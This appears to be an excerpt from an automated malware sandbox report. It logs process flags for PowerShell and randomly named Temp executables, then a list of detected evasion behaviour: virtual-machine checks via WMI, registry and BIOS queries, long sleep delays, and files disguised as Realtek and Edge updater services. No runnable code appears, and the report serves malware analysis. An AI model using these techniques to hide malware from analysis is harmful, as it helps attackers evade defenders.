                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PortConnector
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PortConnector
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PortConnector
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSAcpi_ThermalZoneTemperature
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSAcpi_ThermalZoneTemperature
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSAcpi_ThermalZoneTemperature
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeSystem information queried: FirmwareTableInformation
                              Source: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exeSystem information queried: FirmwareTableInformation
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeAPI/Special instruction interceptor: Address: 7FFCC372D044
                              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFCC372D044
                              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 50FB83A
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeMemory allocated: A70000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeMemory allocated: 1A630000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeMemory allocated: AF0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeMemory allocated: 1A4F0000 memory reserve | memory write watch
                              Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3399Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 802Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7129Jump to behavior
